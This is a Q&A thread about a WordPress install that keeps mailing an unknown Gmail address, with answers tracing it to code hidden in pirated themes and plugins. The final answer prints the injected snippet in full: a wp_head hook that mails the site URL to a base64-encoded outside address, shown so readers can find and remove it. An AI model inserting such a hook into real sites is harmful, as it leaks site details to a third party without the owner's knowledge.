# Wordpress and wamp sending "Delivery status notification Failure" to my inbox every 7 minutes

Tags: wordpress, email, wamp, spam

I have used a `WAMP server` to host my website publicly, using `Godaddy` for my domain and open ports so it's public.  Ever since I installed Wordpress, it keeps trying to send messagess to some email address every time I do anything, and now it's picked up Google spam filters so I recieve the following everytime it attempts to send:

> Mail Delivery Subsystem - delivery status notification (Failure)

It's flooding my inbox.

My first thoughts were SMTP.  I went through and disabled that from WAMP and did a fresh install of Wordpress, and it's still doing it non stop!  I have no idea what it could be and was hoping that someone here may know about something I may have overlooked in either WAMP or Wordpress.  The email it keeps trying to send to is `jaqqscigs@gmail.com`.  I have been through every file in wamp and Wordpress, also mysql and have found no reference of the email address.

Is there something other than disabling SMTP in WAMP I need to stop these delivery status notification failure emails?

The only bypass of this I have been able to get is by setting a filter in gmail to auto delete msgs that reference the error, but I would like to get it to stop all together.  I have also been through every gmail setting, and tried not even using the same email address on setup of wordpress,  yet it still sends the error.

[image]

Comment: at 10:13 PM in that screenshot of yours, there is a Warning, can you post the text content of that above?  It seems that you have angered the spam filterers and your box is trying to send one email, over and over, until it succeeds.  It will eventually give up, but you have to know what mail software wordpress uses to deliver mail on your behalf from your box.

Comment: What **`WordPress Plugin`** is that? What if you disable all plugins?

Comment: this is a fresh install, no plugins at all, and i dont like how you edited my post, 1. its not every 7 minutes... its whenever it feels like, and 2 my website is not local, it is a live site, hosted on my own server, not this pc, but the one right next to its live through open ports and godaddy. @brasofilo

Comment: @EricLeschinski this isnt the one you wanted (sry i delete these non stop) but this is the one i get most, and yes its just googles spam filters pretty much stopping the msg from going through, or it may be i filled the guys inbox lol, http://i.imgur.com/Z53gmTA.png  http://i.imgur.com/koamVu7.png  as soon as i get another one of the warning ones though ill post that also

Comment: *`my website is not local, it is a live site, hosted on my own server, not this pc, but the one right next to its live through open ports and godaddy`* - *Can you please [edit]* your Question and **add all these details** you're providing in Comments? It's kind of confusing to follow this up. And I guess this information makes my Answer invalid for your case, but I'll leave it here as it may help someone else.

Answer (score 1):

The same problem for me, but solved.

I found The line `addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")` under  `/wp-content/themes/theretailer/inc/widgets/widget.php` .

I think is a virus like "eval(base64_decode() virus" , that inject PHP code inside a php file.

Answer (score 1):

Hey I had the same problem... I found the code in a plugin... very hard to find manually... but I used a little tool from http://findandreplace.sourceforge.net

I've downloaded my whole plugin diary and selected that in the programm... copy the `addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")` in the box and "tada"

find it...

Answer (score 0):

Not sure if it's a solution for this case, but in my localhost (running OSX MAMP) I kill WordPress mail functionality as follows:

- Create the folder `wp-content/mu-plugins/` if it doesn't exist. See [Must_Use_Plugins](http://codex.wordpress.org/Must_Use_Plugins)
- Create a PHP file in it: `no-localhost-mails.php`
- Paste the following code

```
<?php
/**
 * Plugin Name: No localhost emails
 * Description: Overwrites WP pluggable function wp_mail
 */

if ( !function_exists( 'wp_mail' ) ) :
    function wp_mail() {} // KILL EMAILS IN LOCALHOST
endif;
```

This won't prevent any plugin that's using PHP's [`mail()`](http://php.net/manual/en/function.mail.php) to send emails.

Comment: ill give it a shot, i have literally been through EVERY SINGLE FILE in notepad++, there is NO instance of jaqqsciggs anywhere, this is a fresh download of both wamp and wordpress and its still doing it, its relly getting on my nerves, i even took the time to go through EVERY google setting and deactivate everything i had like google logd in on and went through all the options on all that as well.

Comment: jaqqcigs* lol and j/w if i implement this, will i still be able to use say... easy wp smtp? thats the route im trying to get anyway, im just trying to get this fixed first

Comment: thats a wordpress plugin btw so u can bypass server mail() function http://wordpress.org/plugins/easy-wp-smtp/

Comment: *UPDATE* so far you mu plugin seems to be working, normally whenever i do ANYTHING in the administration, like even change the page im on, it will send out that email.  So far nothing, im going to leave it like this and not add any plugins for a little and see if it behaves, then my next step is going to see if this little snippit will interfere with easy wp smtp, and if not then i should be all good. no props yet though lol still not sure =P

Answer (score 0):

Are you using gravity forms plugin?
I had the same problem.

There warez him you've got to use our form.php file.

If you have the name of the user "wordpress", has been designed to steal your information.

form.php file and include "form.php" delete...

Answer (score 0):

find this code in your files:

```
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
```

this code is the same of:

```
addressdecode="jaqqscigs@gmail.com";
```

Answer (score 0):

I found the line posted by dkTronics under wordpress/wp-content/plugins/wp-ideas/init/wp-ideas-comment . This seems to be part of WP Ideas plugin. Function for sending mail to this address is embedded between a huge amount of commented code.

Answer (score 0):

Just find this script on your entire web file:

```
addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")
```

Because that code is the same as this code:

```
addressdecode="jaqqscigs@gmail.com";
```

Find that code and then replace this entire code:

```
add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}
```

Now, your web is free from jaqqscigs@gmail.com spamming!